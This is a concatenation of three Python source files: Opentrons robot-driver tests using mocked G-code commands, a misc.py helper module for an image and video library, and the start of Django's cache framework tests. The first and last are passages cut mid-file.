driver. When issuing movement commands in test, `simulating` should be True, but when testing whether `pause` actually pauses and `resume` resumes, `simulating` must be False. """ pipette = model.instrument._instrument robot = model.robot robot.home() homed_coords = pose_tracker.absolute(robot.poses, pipette) robot._driver.simulating = False robot.pause() robot._driver.simulating = True def _move_head(): robot.poses = pipette._move(robot.poses, x=100, y=0, z=0) thread = Thread(target=_move_head) thread.start() sleep(0.5) # Check against home coordinates before calling resume to ensure that robot # doesn't move while paused coords = pose_tracker.absolute(robot.poses, pipette) assert isclose(coords, homed_coords).all() robot._driver.simulating = False robot.resume() robot._driver.simulating = True thread.join() coords = pose_tracker.absolute(robot.poses, pipette) expected_coords = (100, 0, 0) assert isclose(coords, expected_coords).all() def test_speed_change(robot, instruments, monkeypatch): ulmm = { "aspirate": [[100, 0, 0.5]], "dispense": [[100, 0, 0.5]] } pipette = instruments.Pipette(mount='right', ul_per_mm=ulmm) robot._driver.simulating = False command_log = [] def write_with_log(command, ack, connection, timeout, tag=None): if 'G0F' in command: command_log.append(command.strip()) elif 'M114' in command: return 'ok MCS: X:0.00 Y:0.00 Z:0.00 A:0.00 B:0.00 C:0.00' return driver_3_0.SMOOTHIE_ACK monkeypatch.setattr(serial_communication, 'write_and_return', write_with_log) pipette.tip_attached = True pipette.max_volume = 100 pipette._working_volume = 100 pipette.set_speed(aspirate=20, dispense=40) pipette.aspirate(10) pipette.dispense(10) expected = [ ['G0F1200'], # pipette's default aspirate speed in mm/min ['G0F24000'], ['G0F2400'], # pipette's default dispense speed in mm/min ['G0F24000'], ] fuzzy_assert(result=command_log, expected=expected) def test_max_speed_change(robot, smoothie, monkeypatch): smoothie.simulating = False robot._driver = smoothie from opentrons.drivers import serial_communication from opentrons.drivers.smoothie_drivers import driver_3_0 command_log = [] def write_with_log(command, ack, connection, timeout, tag=None): if 'M203.1' in command or 'G0F' in command: command_log.append(command.strip()) return driver_3_0.SMOOTHIE_ACK monkeypatch.setattr(serial_communication, 'write_and_return', write_with_log) robot.head_speed(555) robot.head_speed(x=1, y=2, z=3, a=4, b=5, c=6) robot.head_speed(123, x=7) robot._driver.push_speed() robot._driver.set_speed(321) robot._driver.pop_speed() expected = [ ['G0F{}'.format(555 * 60)], ['M203.1 A4 B5 C6 X1 Y2 Z3'], ['M203.1 X7'], ['G0F{}'.format(123 * 60)], ['G0F{}'.format(321 * 60)], ['G0F{}'.format(123 * 60)], ] fuzzy_assert(result=command_log, expected=expected) @pytest.mark.api1_only def test_pause_in_protocol(model): model.robot._driver.simulating = True model.robot.pause() assert model.robot._driver.run_flag.is_set() def test_send_command_with_retry(robot, smoothie, monkeypatch): smoothie.simulating = False robot._driver = smoothie count = 0 def _no_response(command, ack, connection, timeout, tag=None): nonlocal count count += 1 if count < 3: raise serial_communication.SerialNoResponse('No response') else: return 'ok' monkeypatch.setattr(serial_communication, 'write_and_return', _no_response) # force `write_and_return` to raise exception just once count = 0 res = robot._driver._send_command('test') assert res == 'ok' # force `write_and_return` to raise exception twice count = -1 with pytest.raises(serial_communication.SerialNoResponse): robot._driver._send_command('test') def test_unstick_axes(robot, smoothie): import types smoothie.simulating = False robot._driver = smoothie def update_position_mock(self, default=None): if default is None: default = self._position updated_position = self._position.copy() updated_position.update(**default) robot._driver.update_position = types.MethodType( update_position_mock, robot._driver) current_log = [] def send_command_mock(self, command, timeout=12000.0, ack_timeout=5.0): nonlocal current_log current_log.append(command) if 'M119' in command: smoothie_switch_res = 'X_max:0 Y_max:0 Z_max:0 A_max:0 B_max:0 C_max:0' # NOQA smoothie_switch_res += ' _pins ' smoothie_switch_res += '(XL)2.01:0 (YL)2.01:0 (ZL)2.01:0 ' smoothie_switch_res += '(AL)2.01:0 (BL)2.01:0 (CL)2.01:0 Probe: 0\r\n' # NOQA return smoothie_switch_res robot._driver._send_command = types.MethodType( send_command_mock, robot._driver) robot._driver.unstick_axes('BC') expected = [ 'M203.1 B1 C1', # slow them down 'M119', # get the switch status # move 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0B-1C-1', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', # set plunger current 'M203.1 A125 B40 C40 X600 Y400 Z125' # return to normal speed ] assert current_log == expected current_log = [] robot._driver.unstick_axes('XYZA') expected = [ 'M203.1 A1 X1 Y1 Z1', # slow them down 'M119', # get the switch status 'M907 A0.8 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4P0.005 G0A-1X-1Y-1Z-1', # noqa(E501) 'M203.1 A125 B40 C40 X600 Y400 Z125' # return to normal speed ] assert current_log == expected def send_command_mock(self, command, timeout=12000.0, ack_timeout=5.0): nonlocal current_log current_log.append(command) if 'M119' in command: smoothie_switch_res = 'X_max:0 Y_max:0 Z_max:0 A_max:0 B_max:0 C_max:1' # NOQA smoothie_switch_res += ' _pins ' smoothie_switch_res += '(XL)2.01:0 (YL)2.01:0 (ZL)2.01:0 ' smoothie_switch_res += '(AL)2.01:0 (BL)2.01:0 (CL)2.01:0 Probe: 0\r\n' # NOQA return smoothie_switch_res robot._driver._send_command = types.MethodType( send_command_mock, robot._driver) current_log = [] robot._driver.unstick_axes('BC') expected = [ 'M203.1 B1 C1', # set max-speeds 'M119', # get switch status # MOVE B 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0B-2', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', # low current B 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G28.2C', # HOME C 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', # low current C 'M203.1 A125 B40 C40 X600 Y400 Z125' # reset max-speeds ] assert current_log == expected def send_command_mock(self, command, timeout=12000.0, ack_timeout=5.0): nonlocal current_log current_log.append(command) if 'M119' in command: smoothie_switch_res = 'X_max:0 Y_max:0 Z_max:0 A_max:0 B_max:1 C_max:1' # NOQA smoothie_switch_res += ' _pins ' smoothie_switch_res += '(XL)2.01:0 (YL)2.01:0 (ZL)2.01:0 ' smoothie_switch_res += '(AL)2.01:0 (BL)2.01:0 (CL)2.01:0 Probe: 0\r\n' # NOQA return smoothie_switch_res robot._driver._send_command = types.MethodType( send_command_mock, robot._driver) current_log = [] robot._driver.unstick_axes('BC') expected = [ 'M203.1 B1 C1', # set max-speeds 'M119', # get switch status 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G28.2BC', # HOME BC 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', # low current BC 'M203.1 A125 B40 C40 X600 Y400 Z125' # reset max-speeds ] assert current_log == expected def test_alarm_unhandled(smoothie, robot, monkeypatch): smoothie.simulating = False robot._driver = smoothie killmsg = 'ALARM: Kill button pressed - reset or M999 to continue\r\n' def fake_write_and_return(cmdstr, ack, conn, timeout=None, tag=None): return cmdstr + killmsg monkeypatch.setattr(serial_communication, 'write_and_return', fake_write_and_return) assert serial_communication.write_and_return is fake_write_and_return robot._driver.move({'X': 0}) robot._driver._is_hard_halting.set() with pytest.raises(driver_3_0.SmoothieAlarm): robot._driver.move({'X': 25}) assert not robot._driver._is_hard_halting.is_set() def test_move_splitting(smoothie, robot, monkeypatch): smoothie.simulating = False command_log = [] time_mock = Mock() monkeypatch.setattr(utils.time, 'monotonic', time_mock) time_mock.return_value = 0 def send_command_logger(command, timeout=12000.0, ack_timeout=5.0): nonlocal command_log command_log.append(command) monkeypatch.setattr(smoothie, '_send_command', send_command_logger) smoothie.update_steps_per_mm({'B': 3200, 'C': 3200}) command_log.clear() time_mock.return_value = 10 smoothie.move({'X': 100}) # no backlash, no move splitting, nice and easy assert command_log\ == ['M907 A0.1 B0.05 C0.05 X1.25 Y0.3 Z0.1 G4P0.005 G0X100'] command_log.clear() # move splitting but for a different axis - ignored smoothie.configure_splits_for({'B': types.MoveSplit( split_distance=50, split_current=1.5, split_speed=0.5, after_time=0, fullstep=True)}) time_mock.return_value = 20 smoothie.move({'C': 10}) assert command_log\ == ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0C10.3 G0C10', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'] command_log.clear() # move splits that are longer than the move get eaten both in - time_mock.return_value = 40 smoothie.configure_splits_for( {'B': types.MoveSplit( split_distance=30, split_current=1.5, split_speed=0.5, after_time=0, fullstep=False)}) smoothie._position['B'] = 100 smoothie.move({'B': 75}) assert command_log\ == ['G0F30 M907 A0.1 B1.5 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', 'G0B75', 'G0F24000 M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0B75', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'] command_log.clear() # and in + time_mock.return_value = 50 smoothie.move({'B': 100}) assert command_log\ == ['G0F30 M907 A0.1 B1.5 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', 'G0B100.3', 'G0F24000 M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 ' 'G0B100.3 G0B100', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'] # if backlash is involved, it's added on top # prep by moving to 0 time_mock.return_value = 60 smoothie.move({'C': 0}) smoothie.configure_splits_for({'C': types.MoveSplit( split_distance=1, split_current=2.0, split_speed=1, after_time=0, fullstep=True)}) command_log.clear() smoothie.move({'C': 20}) assert command_log\ == ['M55 M92 C100.0 G4P0.01 ' 'G0F60 M907 A0.1 B0.05 C2.0 X0.3 Y0.3 Z0.1 G4P0.005', 'G0C1', 'M54 M92 C3200 G4P0.01', 'G0F24000 M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 ' 'G0C20.3 G0C20', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'] # noqa(E501) # if backlash is involved, the backlash target should be the limit # for the split move smoothie.move({'C': 15}) smoothie.configure_splits_for({'C': types.MoveSplit( split_distance=10, split_current=2.0, split_speed=1, after_time=0, fullstep=True)}) command_log.clear() time_mock.return_value = 70 smoothie.move({'C': 20}) # note that the backlash/target move has a 0.05A current on C even though # it is active because that is the robot config default active plunger # current. when the driver is used with the rest of the robot or hardware # control stack it uses the higher currents assert command_log\ == ['M55 M92 C100.0 G4P0.01 ' 'G0F60 M907 A0.1 B0.05 C2.0 X0.3 Y0.3 Z0.1 G4P0.005', 'G0C20.3', 'M54 M92 C3200 G4P0.01', 'G0F24000 M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 ' 'G0C20.3 G0C20', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'] # noqa(E501) smoothie.configure_splits_for( {'B': types.MoveSplit( split_distance=50, split_current=1.5, split_speed=0.5, after_time=10, fullstep=True)}) # timing: if the axis has moved recently (since we're changing the # time mock) it shouldn't split. first move to reset the last moved at smoothie.move({'B': 0}) command_log.clear() # this move therefore should not split smoothie.move({'B': 100}) assert command_log[0:1] == [ 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0B100.3 G0B100'] command_log.clear() # nor should this move time_mock.return_value = 79 smoothie.move({'B': 1}) assert command_log[0:1] == [ 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0B1'] command_log.clear() # now that we advance time, we split time_mock.return_value = 89.01 command_log.clear() smoothie.move({'B': 100}) assert command_log == [ 'M53 M92 B100.0 G4P0.01 G0F30 ' 'M907 A0.1 B1.5 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', 'G0B51', 'M52 M92 B3200 G4P0.01', 'G0F24000 M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 ' 'G0B100.3 G0B100', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'] def test_per_move_speed(smoothie, robot, monkeypatch): smoothie.simulating = False command_log = [] def send_command_logger(command, timeout=12000.0, ack_timeout=5.0): nonlocal command_log command_log.append(command) monkeypatch.setattr(smoothie, '_send_command', send_command_logger) # no speed argument: use combined speed smoothie.move({'X': 100}) assert command_log[0]\ == 'M907 A0.1 B0.05 C0.05 X1.25 Y0.3 Z0.1 G4P0.005 G0X100' command_log.clear() # specify speed: both set and reset smoothie.move({'Y': 100}, speed=100) assert command_log[0]\ == 'G0F6000 M907 A0.1 B0.05 C0.05 X0.3 Y1.25 Z0.1 G4P0.005 G0Y100 G0F24000' # noqa(E501)
misc.py
# Helpers that don't have dependancies on our other modules. import asyncio, concurrent, os, io, struct, os, threading, time, traceback, sys, queue from contextlib import contextmanager from PIL import Image, ExifTags from pprint import pprint from ..util.tiff import get_tiff_metadata from .video_metadata import mp4, mkv, gif image_types = { '.png': 'image/png', '.jpg': 'image/jpeg', '.jpeg': 'image/jpeg', '.bmp': 'image/bmp', '.gif': 'image/gif', '.webp': 'image/webp', '.tif': 'image/tiff', '.tiff': 'image/tiff', } video_types = { '.webm': 'video/webm', '.mp4': 'video/mp4', '.m4v': 'video/mp4', '.mkv': 'video/x-matroska', '.mov': 'video/video/quicktime', '.3gp': 'video/video/3gpp', } def file_type_from_ext(ext): if ext.lower() in image_types: return 'image' if ext.lower() in video_types: return 'video' return None def mime_type_from_ext(ext, allow_unknown=False): ext = ext.lower() if ext in image_types: return image_types[ext] if ext in video_types: return video_types[ext] if allow_unknown: return 'application/octet-stream' else: return None def _get_ext(path): # os.path.splitext is very slow for some reason, so we split the extension # ourself. path = str(path) parts = path.rsplit('.', 1) if len(parts) < 2: return 'None' return '.' + parts[1].lower() def file_type(path): ext = _get_ext(path) return file_type_from_ext(ext) def mime_type(path): ext = _get_ext(path) return mime_type_from_ext(ext) class Error(Exception): def __init__(self, code, reason): self.code = code self.reason = reason def data(self): return { 'success': False, 'code': self.code, 'reason': self.reason, } exif_tag_ids = { value: key for key, value in ExifTags.TAGS.items() } def read_metadata(f, mime_type): """ Parse basic metadata from a file. This is currently only implemented for JPEGs. """ if mime_type.startswith('video/'): if mime_type == 'video/mp4': data = mp4.parse(f) elif mime_type in ('video/webm', 'video/x-matroska'): data = mkv.parse(f) else: return { } return { 'width': data.get('width'), 'height': data.get('height'), 'title': data.get('tag/nam') or '', 'comment': data.get('tag/cmt') or '', 'artist': data.get('tag/ART') or '', 'tags': '', 'codec': data.get('codec'), 'duration': data.get('duration'), # "animation" means we'll use the ZIP animation format for the file rather # than treat it as a video, since browsers don't support MJPEG. 'animation': data.get('codec') == 'V_MJPEG', } if not mime_type.startswith('image/'): return { } # Use our own parser for GIFs, since PIL is slow at this. if mime_type == 'image/gif': data = gif.parse_gif_metadata(f).data return { 'width': data['width'], 'height': data['height'], 'duration': data['duration'], 'frame_durations': data['frame_durations'], 'animation': len(data['frame_durations']) > 1, } # Use our faster implementation to get metadata from TIFFs. if mime_type == 'image/tiff': return get_tiff_metadata(f) result = { } try: img = Image.open(f) except Exception as e: # should be IOError, but the WebP decoder sometimes fails with RuntimeError print('Couldn\'t read metadata from %s: %s' % (f, e)) return { } result['width'] = img.size[0] result['height'] = img.size[1] # PIL's parser for PNGs is very slow, so only support metadata from JPEG for now. if mime_type == 'image/jpeg' and hasattr(img, '_getexif'): exif_dict = img._getexif() if exif_dict is None: exif_dict = { } def get_exif_string_tag(name, exif_name): data = exif_dict.get(exif_tag_ids[exif_name]) if not data: return try: data = data.decode('UTF-16LE') except UnicodeDecodeError: return # These are null-terminated. data = data.rstrip('\u0000') result[name] = data get_exif_string_tag('title', 'XPTitle') get_exif_string_tag('comment', 'XPComment') get_exif_string_tag('artist', 'XPAuthor') get_exif_string_tag('tags', 'XPKeywords') # XPAuthor is semicolon separated. Reformat this to comma-separated. if 'artist' in result: result['artist'] = ', '.join(result['artist'].split(';')) # Tags is semicolon-separated. Reformat this to space-separated. if 'tags' in result: result['tags'] = ' '.join(result['tags'].split(';')) # See if this image is rotated by 90 or 270 degrees and swap the dimensions # if needed. exif = img.getexif() ORIENTATION = 0x112 image_orientation = exif.get(ORIENTATION, 0) rotated = image_orientation >= 5 if rotated: result['width'], result['height'] = result['height'], result['width'] return result class AsyncEvent: """ A simple async implementation of threading.Event. """ def __init__(self): self.waits = set() self._is_set = False @property def is_set(self): return self._is_set def set(self): self._is_set = True # Wake up all waiters. for future in self.waits: if not future.done(): future.set_result(True) def clear(self): self._is_set = False async def wait(self, timeout=None): """ Wait up to timeout to be woken up. Return true if we were woken up, false if we timed out. """ if self._is_set: return True future = asyncio.get_running_loop().create_future() self.waits.add(future) try: await asyncio.wait_for(future, timeout) return True except asyncio.TimeoutError: return False finally: self.waits.remove(future) class RunMainTask: """ Run the main async task. asyncio is unreliable with KeyboardInterrupt. However, KeyboardInterrupt shouldn't be used anyway. It's much more reliable to just cancel the main task and never raise KeyboardInterrupt inside it. This runs the main task in a thread, so it doesn't see KeyboardInterrupt, and cancels it on interrupt. main() will be called with a set_main_task keyword argument, which should be called from within the main task that should be cancelled on interrupt. """ def __init__(self, main): self._main = main self._task_finished = threading.Event() self._main_loop = None self._main_task = None self._thread = threading.Thread(target=self._run, name='main') self._thread.start() interrupt_count = 0 last_interrupt_at = 0 while self._thread.is_alive(): try: # XXX: classic Python problem, join() blocks KeyboardInterrupt if self._thread.join(.1): break except KeyboardInterrupt: if time.time() - last_interrupt_at > 5: interrupt_count = 0 interrupt_count += 1 last_interrupt_at = time.time() if interrupt_count >= 3: # The user hit ^C a few times and we haven't exited, so force the issue. print('Exiting') os._exit(0) self._cancel_main_task() def _cancel_main_task(self): if self._main_task is None: print('No main task to cancel') return assert self._main_loop is not None print('Shutting down...') future = asyncio.run_coroutine_threadsafe(self._do_cancel_main_task(), self._main_loop) try: # Wait for _do_cancel_main_task to complete. This doesn't mean the task has finished. future.result(timeout=5) return except concurrent.futures.TimeoutError: # This should never happen. print('Shutdown timed out') this_thread_id = threading.current_thread().ident frames = sys._current_frames() for thread in threading.enumerate(): thread_id = thread.ident if thread_id == this_thread_id: continue if not thread.is_alive(): continue print(f'Thread {thread_id}: {thread.name}') thread_frames = frames.get(thread_id) if thread_frames: traceback.print_stack(thread_frames, limit=4) print('') del frames if False: for task in asyncio.all_tasks(self._main_loop): print(task) print('stack:') task.print_stack() print('') async def _do_cancel_main_task(self): self._main_task.cancel() def _run(self): try: self._main(set_main_task=self.set_main_task) except asyncio.CancelledError as e: # XXX: signal the main thread that we've finished return finally: self._task_finished.set() def set_main_task(self): self._main_loop = asyncio.get_running_loop() self._main_task = asyncio.current_task() class TransientWriteConnection: """ This is a convenience wrapper for opening and closing database connections. We often run searches, which can perform writes to the database, then yield to the caller. When we do that, we might not be resumed for a long time, and we need to be sure not to keep a write transaction pending. However, we don't want to open a new transaction for every write. TransientWriteConnection is used as a context manager, and opens a connection on demand. The connection remains open when the context manager exits. To close the connection, call commit(). The connection will be committed and closed, and will be reopened the next time it's used. """ def __init__(self, db): self.db = db self.in_use = False self.connection = None self.connection_ctx = None def __enter__(self): assert not self.in_use self.in_use = True if self.connection is None: # Open a connection. Note that db.connect() is a context manager, and we need # to keep a reference to it, both so we can call __exit__ when we're done and because # if it's GC'd, the context manager will be exited prematurely. self.connection_ctx = self.db.connect(write=False) try: self.connection = self.connection_ctx.__enter__() except: self.in_use = False self.connection_ctx = None raise return self.connection def __exit__(self, type, value, traceback): assert self.in_use self.in_use = False # If the context manager closes without an exception, don't commit the connection. if type is None: return # Pass exceptions to the connection to roll back and release the connection. ctx = self.connection_ctx self.connection = None self.connection_ctx = None # Pass exceptions to the self.connection context manager, so it'll roll # back the transaction and shut down. ctx.__exit__(type, value, traceback) def commit(self): assert not self.in_use if self.connection is None: return ctx = self.connection_ctx self.connection_ctx = None self.connection = None ctx.__exit__(None, None, None) def __del__(self): if not self.in_use: return print('Warning: TransientWriteConnection wasn\'t closed') class WithBuilder: """ Build an SQL WITH statement for a list of rows. builder = WithBuilder('id', 'name', table_name='names') builder.add_row(1, 'Name1') builder.add_row(2, 'Name2') params = [] builder.get_params(params) with_statement = builder.get() """ def __init__(self, *fields, table_name): self.table_name = table_name self.fields = fields self.rows = [] def add_row(self, *row): assert len(row) == len(self.fields) self.rows.append(row) def get_params(self, params): for row in self.rows: params.extend(row) def get(self): """ Return the WITH statement, eg. files(id, name) AS (VALUES (?, ?), (?, ?)) This doesn't include "WITH" itself, since these are normally combined. """ # It seems to be impossible to have a WITH statement with no values, which # is a pain. if not self.rows: self.add_row([None] * len(self.fields)) # Placeholder for one row, eg. '(?, ?)' row_placeholder = ['?'] * len(self.fields) row_placeholder = f"({', '.join(row_placeholder)})" # Placeholder for all rows, eg. '(?, ?), (?, ?), (?, ?)' all_row_placeholders = [row_placeholder] * len(self.rows) all_row_placeholders = ', '.join(all_row_placeholders) return f""" {self.table_name} ({', '.join(self.fields)}) AS (VALUES {all_row_placeholders}) """ class FixedZipPipe: """ Work around two Python bugs: - os.pipe is badly broken on Windows. They don't throw an exception on seek and always return 0 from tell(), which completely breaks ZipFile. It's a known bug and nobody seems to care that a core API is broken. It also returns EINVAL instead of EPIPE if the other side is closed, which is confusing. - If zipfile is given a non-seekable stream, it writes 0 as the file size in the local file header. That's unavoidable if you're streaming data, but it makes no sense with writestr(), which receives the whole file at once. It results in unstreamable ZIPs, and we need streamable ZIPs. We fix this by calling about_to_write_file with the file size right before writing the file, and then replacing the file size in the local file header on the next write() call. """ def __init__(self, file): self.pos = 0 self.file = file self.next_write_is_local_file_header = None def write(self, data): if self.next_write_is_local_file_header is not None: assert len(data) >= 26 size = struct.pack('<L', self.next_write_is_local_file_header) data = data[0:22] + size + data[26:] self.next_write_is_local_file_header = None bytes = self.file.write(data) self.pos += bytes def tell(self): return self.pos def close(self): self.file.close() def __enter__(self): return self.file.__enter__() def __exit__(self, *args): return self.file.__exit__(*args) def flush(self): self.file.flush() def about_to_write_file(self, size): self.next_write_is_local_file_header = size pass @contextmanager def WriteZip(zip): """ A fixed context handler for ZipFile. ZipFile's __exit__ doesn't check whether it's being called with an exception and blindly calls close(), which causes ugly chains of exceptions: a write throws an exception, then ZipFile tries to close the file during exception handling, which also throws an exception. We can't just not call close() on exception, or ZipFile does something else it shouldn't: it tries to write to the file in __del__. That causes random writes to files and exceptions during GC later on. Fix this by clearing its file on exception. """ try: yield zip zip.close() except: zip.fp = None raise class ThreadedQueue: """ Run an iterator in a thread. The results are queued, and can be retrieved with an iterator. This is used to run searches on a thread, and allow them to complete even if they return more results than we'll return in one page. """ def __init__(self, iterator): self.results = queue.Queue() self.iterator = iterator self.cancel = threading.Event() self.thread = threading.Thread(target=self._read_results) self.thread.start() def _read_results(self): try: for result in self.iterator: if self.cancel.is_set(): break if result is None: continue self.results.put(result) finally: self.results.put(None) def __iter__(self): return self def __next__(self): # If the queue has been discarded, we've already stopped. if self.results is None: raise StopIteration result = self.results.get() if result is None: self._join_thread() raise StopIteration return result def cancel(self): """ Cancel the task, and block is true until the generator has stopped. The iterator will receive GeneratorExit the next time it yields a value. """ self.cancel.set() self._join_thread() def _join_thread(self): self.thread.join() self.results = None import unicodedata def split_keywords(s): """ Split s into search keywords. A split like re.findall(r'\w+') has some problems: it includes underscores, which shouldn't be part of keywords, and it batches numbers with letters, which isn't wanted. For some reason it's hard to get regex to do this (why can't you say [\w^\d] to say "\w minus \d"?), so do it ourself. """ result = [] current_word = '' current_category = None for c in s: category = unicodedata.category(c)[0] # If the category changes, flush the current word. if category != current_category: current_category = category if current_word: result.append(current_word) current_word = '' # Only add letters and numbers. if category not in ('L', 'N'): continue current_word += c if current_word: result.append(current_word) return result
tests.py
# -*- coding: utf-8 -*- # Unit tests for cache framework # Uses whatever cache backend is set in the test settings file. from __future__ import unicode_literals import os import re import shutil import tempfile import threading import time import unittest import warnings from django.conf import settings from django.core import management from django.core.cache import cache, caches, CacheKeyWarning, InvalidCacheBackendError from django.db import connection, router, transaction from django.core.cache.utils import make_template_fragment_key from django.http import HttpResponse, StreamingHttpResponse from django.middleware.cache import (FetchFromCacheMiddleware, UpdateCacheMiddleware, CacheMiddleware) from django.template import Template from django.template.response import TemplateResponse from django.test import TestCase, TransactionTestCase, RequestFactory, override_settings from django.test.utils import (IgnoreDeprecationWarningsMixin, IgnorePendingDeprecationWarningsMixin) from django.utils import six from django.utils import timezone from django.utils import translation from django.utils.cache import (patch_vary_headers, get_cache_key, learn_cache_key, patch_cache_control, patch_response_headers) from django.utils.encoding import force_text from django.views.decorators.cache import cache_page try: # Use the same idiom as in cache backends from django.utils.six.moves import cPickle as pickle except ImportError: import pickle from .models import Poll, expensive_calculation # functions/classes for complex data type tests def f(): return 42 class C: def m(n): return 24 class Unpickable(object): def __getstate__(self): raise pickle.PickleError() @override_settings(CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.dummy.DummyCache', } }) class DummyCacheTests(TestCase): # The Dummy cache backend doesn't really behave like a test backend, # so it has its own test case. def test_simple(self): "Dummy cache backend ignores cache set calls" cache.set("key", "value") self.assertEqual(cache.get("key"), None) def test_add(self): "Add doesn't do anything in dummy cache backend" cache.add("addkey1", "value") result = cache.add("addkey1", "newvalue") self.assertEqual(result, True) self.assertEqual(cache.get("addkey1"), None) def test_non_existent(self): "Non-existent keys aren't found in the dummy cache backend" self.assertEqual(cache.get("does_not_exist"), None) self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!") def test_get_many(self): "get_many returns nothing for the dummy cache backend" cache.set('a', 'a') cache.set('b', 'b') cache.set('c', 'c') cache.set('d', 'd') self.assertEqual(cache.get_many(['a', 'c', 'd']), {}) self.assertEqual(cache.get_many(['a', 'b', 'e']), {}) def test_delete(self): "Cache deletion is transparently ignored on the dummy cache backend" cache.set("key1", "spam") cache.set("key2", "eggs") self.assertEqual(cache.get("key1"), None) cache.delete("key1") self.assertEqual(cache.get("key1"), None) self.assertEqual(cache.get("key2"), None) def test_has_key(self): "The has_key method doesn't ever return True for the dummy cache backend" cache.set("hello1", "goodbye1") self.assertEqual(cache.has_key("hello1"), False) self.assertEqual(cache.has_key("goodbye1"), False) def test_in(self): "The in operator doesn't ever return True for the dummy cache backend" cache.set("hello2", "goodbye2") self.assertEqual("hello2" in cache, False) self.assertEqual("goodbye2" in cache, False) def test_incr(self): "Dummy cache values can't be incremented" cache.set('answer', 42) self.assertRaises(ValueError, cache.incr, 'answer') self.assertRaises(ValueError, cache.incr, 'does_not_exist') def test_decr(self): "Dummy cache values can't be decremented" cache.set('answer', 42) self.assertRaises(ValueError, cache.decr, 'answer') self.assertRaises(ValueError, cache.decr, 'does_not_exist') def test_data_types(self): "All data types are ignored equally by the dummy cache" stuff = { 'string': 'this is a string', 'int': 42, 'list': [1, 2, 3, 4], 'tuple': (1, 2, 3, 4), 'dict': {'A': 1, 'B': 2}, 'function': f, 'class': C, } cache.set("stuff", stuff) self.assertEqual(cache.get("stuff"), None) def test_expiration(self): "Expiration has no effect on the dummy cache" cache.set('expire1', 'very quickly', 1) cache.set('expire2', 'very quickly', 1) cache.set('expire3', 'very quickly', 1) time.sleep(2) self.assertEqual(cache.get("expire1"), None) cache.add("expire2", "newvalue") self.assertEqual(cache.get("expire2"), None) self.assertEqual(cache.has_key("expire3"), False) def test_unicode(self): "Unicode values are ignored by the dummy cache" stuff = { 'ascii': 'ascii_value', 'unicode_ascii': 'Iñtërnâtiônàlizætiøn1', 'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2', 'ascii2': {'x': 1} } for (key, value) in stuff.items(): cache.set(key, value) self.assertEqual(cache.get(key), None) def test_set_many(self): "set_many does nothing for the dummy cache backend" cache.set_many({'a': 1, 'b': 2}) cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1') def test_delete_many(self): "delete_many does nothing for the dummy cache backend" cache.delete_many(['a', 'b']) def test_clear(self): "clear does nothing for the dummy cache backend" cache.clear() def test_incr_version(self): "Dummy cache versions can't be incremented" cache.set('answer', 42) self.assertRaises(ValueError, cache.incr_version, 'answer') self.assertRaises(ValueError, cache.incr_version, 'does_not_exist') def test_decr_version(self): "Dummy cache versions can't be decremented" cache.set('answer', 42) self.assertRaises(ValueError, cache.decr_version, 'answer') self.assertRaises(ValueError, cache.decr_version, 'does_not_exist') def custom_key_func(key, key_prefix, version): "A customized cache key function" return 'CUSTOM-' + '-'.join([key_prefix, str(version), key]) _caches_setting_base = { 'default': {}, 'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())}, 'v2': {'VERSION': 2}, 'custom_key': {'KEY_FUNCTION': custom_key_func}, 'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'}, 'cull': {'OPTIONS': {'MAX_ENTRIES': 30}}, 'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}}, } def caches_setting_for_tests(base=None, **params): # `base` is used to pull in the memcached config from the original settings, # `params` are test specific overrides and `_caches_settings_base` is the # base config for the tests. # This results in the following search order: # params -> _caches_setting_base -> base base = base or {} setting = dict((k, base.copy()) for k in _caches_setting_base.keys()) for key, cache_params in setting.items(): cache_params.update(_caches_setting_base[key]) cache_params.update(params) return setting class BaseCacheTests(object): # A common set of tests to apply to all cache backends def setUp(self): self.factory = RequestFactory() def tearDown(self): cache.clear() def test_simple(self): # Simple cache set/get works cache.set("key", "value") self.assertEqual(cache.get("key"), "value") def test_add(self): # A key can be added to a cache cache.add("addkey1", "value") result = cache.add("addkey1", "newvalue") self.assertEqual(result, False) self.assertEqual(cache.get("addkey1"), "value") def test_prefix(self): # Test for same cache key conflicts between shared backend cache.set('somekey', 'value') # should not be set in the prefixed cache 